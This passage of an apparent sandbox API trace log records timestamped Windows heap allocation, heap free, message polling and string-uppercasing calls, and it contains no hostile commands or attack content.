Size=0x20) returned 0x2a782c8 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0151.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0151.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0151.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.235] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.236] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0151.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0151.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.237] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa228 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0151.237] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0151.237] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0151.237] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0151.238] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0151.238] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa198 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a747d8 [0151.238] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0151.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0151.238] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0151.239] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0151.239] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a747d8 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0151.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0151.240] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0151.240] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.240] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa198 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743e8 [0151.240] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0151.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0151.240] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0151.241] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0151.241] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.241] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743e8 | out: hHeap=0x2af0000) returned 1 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0151.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0151.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0151.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0151.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0151.242] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0151.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa228 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0151.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0151.243] HeapFree (in: 